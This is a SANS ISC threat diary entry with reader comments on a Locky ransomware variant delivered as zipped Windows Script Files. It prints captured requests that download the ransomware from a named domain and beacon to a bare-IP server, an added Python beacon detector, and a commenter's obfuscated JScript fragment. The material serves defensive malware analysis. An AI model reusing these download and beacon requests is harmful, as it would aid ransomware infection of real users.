
SANS ISC: Today's Locky Variant Arrives as a Windows Script File - Internet Security | DShield SANS ISC InfoSec Forums


Today's Locky Variant Arrives as a Windows Script File

Pretty much all of the Locky variants I have looked at over the last couple of days arrived as zipped JavaScript files. Today I got something slightly different. While the e-mail looked the same overall, the attachment was a zipped Windows Script File (.wsf). Overall, this isn't all that different: a .wsf file is an XML wrapper whose script element carries JScript, Microsoft's JavaScript dialect, and Windows Script Host runs it just like a plain .js file. The only real difference is the tag at the beginning of the file.

Today's e-mail subject was "Transaction details". Once the user runs the script by double-clicking the file, it downloads the actual crypto-ransomware:

GET /2tn0o HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: onlybest76.xyz
Connection: Keep-Alive

Just like earlier versions, it then "registers" the infected system with a web server that is identified only by its IP address, so you will not see a DNS lookup for it:

POST /data/info.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://95.85.19.195/data/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 95.85.19.195
Content-Length: 942
Connection: Keep-Alive

[post data omitted]
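As an added example (not part of the diary or its capture files), here is a small Python checker that parses raw HTTP request text like the two requests above and names the traits of the registration POST: a Host header that is a bare IP literal (so no DNS lookup preceded it), the /data/info.php path, and a form-encoded POST carrying x-requested-with: XMLHttpRequest. The two sample requests are constructed from the diary's captures with most headers dropped.

```python
import ipaddress

# Constructed samples modelled on the two captured requests in the diary (headers abbreviated).
DOWNLOAD_REQ = (
    "GET /2tn0o HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0;\r\n"
    " .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)\r\n"  # folded continuation line, as in the capture
    "Host: onlybest76.xyz\r\n\r\n"
)
BEACON_REQ = (
    "POST /data/info.php HTTP/1.1\r\n"
    "x-requested-with: XMLHttpRequest\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: 95.85.19.195\r\n\r\n"
)

def parse_request(raw: str) -> tuple[str, str, dict[str, str]]:
    """Return (method, path, headers); header names lower-cased, folded lines re-joined."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    last = ""
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and last:  # obsolete header folding (RFC 7230 3.2.4)
            headers[last] += " " + line.strip()
            continue
        name, _, value = line.partition(":")
        last = name.strip().lower()
        headers[last] = value.strip()
    return method, path, headers

def host_is_ip_literal(host: str) -> bool:
    """True when Host is a bare IP (IPv4, or bracketed IPv6, optional port): no DNS lookup needed."""
    h = host.strip()
    h = h[1:h.find("]")] if h.startswith("[") else h.split(":", 1)[0]
    try:
        ipaddress.ip_address(h)
    except ValueError:
        return False
    return True

def beacon_indicators(raw: str) -> list[str]:
    """Traits of the registration POST described above that this request shows; [] means none."""
    method, path, hdr = parse_request(raw)
    checks = {
        "host-is-ip-literal": host_is_ip_literal(hdr.get("host", "")),
        "registration-path": method == "POST" and path.endswith("/data/info.php"),
        "xhr-form-post": hdr.get("x-requested-with", "").lower() == "xmlhttprequest"
        and hdr.get("content-type", "").startswith("application/x-www-form-urlencoded"),
    }
    return [name for name, hit in checks.items() if hit]
```

Run beacon_indicators() over requests reassembled from a proxy log or pcap; the "host-is-ip-literal" trait alone is worth a look in most corporate networks, where legitimate browser traffic to bare IPs is rare.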

Anti-malware proves its usual value by doing probably slightly better than a blind chicken at protecting you from this malware. You can download a file with the packet capture, mail server logs, and the malware sample here (password: "blind chicken").

Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.


---
Johannes B. Ullrich, Ph.D.

Johannes

3580 Posts
ISC Handler
Also using HTA files today & on other odd occasions recently: https://myonlinesecurity.co.uk/sent-with-genius-scan-for-ios-pretending-to-come-from-your-own-email-address-leads-to-locky-ransomware/
DVK01

21 Posts
Greetings:

I'm pretty sure I just got some malware in the form of a ZIP file containing a .wsf file (XML text). It's a bit long to paste. First few lines:

<?xml?>
<package>
<job id='oevPEW'><script language='JScript'></script><script language='JScript'><![CDATA[
String.prototype.toshibasatelliteLAMODAtiiiyamooo = function() {

If this is of any interest, let me know the best way to get it to you. I'm on an Air Force base, so I may not be able to use methods that work for everyone else.

Thanks.

--
Karl Vogel
vogelke+isc@pobox.com
kvogel

1 Posts
You can upload the file via our contact form: isc.sans.edu/…
Johannes

3580 Posts
ISC Handler
